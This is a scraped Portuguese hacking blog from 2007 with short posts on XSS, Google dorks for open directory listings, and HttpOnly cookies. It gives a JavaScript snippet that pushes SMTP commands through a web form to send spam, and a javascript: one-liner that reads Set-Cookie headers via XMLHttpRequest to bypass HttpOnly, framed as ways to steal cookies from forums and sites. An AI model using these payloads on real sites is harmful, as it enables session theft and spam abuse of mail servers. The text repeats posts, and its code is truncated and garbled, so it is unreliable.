Cross-Site-Scripting é mais conhecido como XSS, ou seja como um HTML Injection.
Ele insere um trecho de HTML no seu site, dependendo por onde irá inserir, por exemplo temos uma página em ASP que contém um XSS
Então podemos fazer assim
&request=Response.Write("Oi");
no caso iria aparecer um Oi.
Os exploits usados nos XSS são mais para roubar cookies de foruns, sites.
Mais sobre XSS
segunda-feira, 17 de setembro de 2007
Oque é HttpOnly?
Muitos me perguntaram isso, então eu resolvi colocar no site.
é uma extenção da Microsoft para proteger os cookies, o site já mostra como exibir esses cookies.
Mais sobre HttpOnly:
http://msdn.microsoft.com/workshop/author/dhtml/httponly_cookies.asp
http://msdn2.microsoft.com/en-us/library/system.web.httpcookie.httponly.aspx
http://msdn2.microsoft.com/en-us/library/system.web.configuration.httpcookiessection.httponlycookies(VS.80).aspx[
By: Ali
é uma extenção da Microsoft para proteger os cookies, o site já mostra como exibir esses cookies.
Mais sobre HttpOnly:
http://msdn.microsoft.com/workshop/author/dhtml/httponly_cookies.asp
http://msdn2.microsoft.com/en-us/library/system.web.httpcookie.httponly.aspx
http://msdn2.microsoft.com/en-us/library/system.web.configuration.httpcookiessection.httponlycookies(VS.80).aspx[
By: Ali
Formas de achar pastas sem index
Bom isto é OLD, mas é legal saber que temoooooos várias pastas jogadas por aí, e podemos ver o conteúdo destas pastas.
Veja aqui: http://www.google.com.br/search?hl=pt-BR&q=%22index+of%22&meta=
Fácil né?
Podemos usar vários comandos como: intitle(título de página), inurl (dentro do link) :)
By: Ali
Veja aqui: http://www.google.com.br/search?hl=pt-BR&q=%22index+of%22&meta=
Fácil né?
Podemos usar vários comandos como: intitle(título de página), inurl (dentro do link) :)
By: Ali
JavaScript Spam!
server='mail.server.com';
document.write('');
s = 'HELO testn';
s += 'EHLO testn';
s += 'MAIL FROM:n';
s += 'RCPT TO:n';
s += 'DATAn';
s += 'From: test@test.comn';
s += 'To: test@test.comn';
s += 'Subject: heh!n';
s += 'testing 123nn';
s += '.nnQUITnn';
document.B.C.value=s;
document.B.submit();
By: Ali
document.write('');
s = 'HELO testn';
s += 'EHLO testn';
s += 'MAIL FROM:
s += 'RCPT TO:
s += 'DATAn';
s += 'From: test@test.comn';
s += 'To: test@test.comn';
s += 'Subject: heh!n';
s += 'testing 123nn';
s += '.nnQUITnn';
document.B.C.value=s;
document.B.submit();
By: Ali
Burlando HttpOnly com Ajax
Muito tempo eu estava tentando burlar o HttpOnly, percebi que os cookies passam por Headers, então feito um script em Ajax que pega os Cookies, é possível também fazer com cURL em PHP.
Em Ajax JavaScript: javascript:a=new XMLHttpRequest;a.open("GET", location, false);a.send(0);alert(a.getResponseHeader("Set-Cookie"));void ( 0 )
É possível também usando Headers !
By: Ali
Em Ajax JavaScript: javascript:a=new XMLHttpRequest;a.open("GET", location, false);a.send(0);alert(a.getResponseHeader("Set-Cookie"));void ( 0 )
É possível também usando Headers !
By: Ali
Adicionando JavaScript nos Headers do Firefox
É possível adicionar JavaScript nos Headers do Firefox, ou seja, seria possível pegar uma imagem e colocar um JavaScript.
Ex de uso no PHP:
By : Ali =D
Ex de uso no PHP:
By : Ali =D
Assinar:
Postagens (Atom)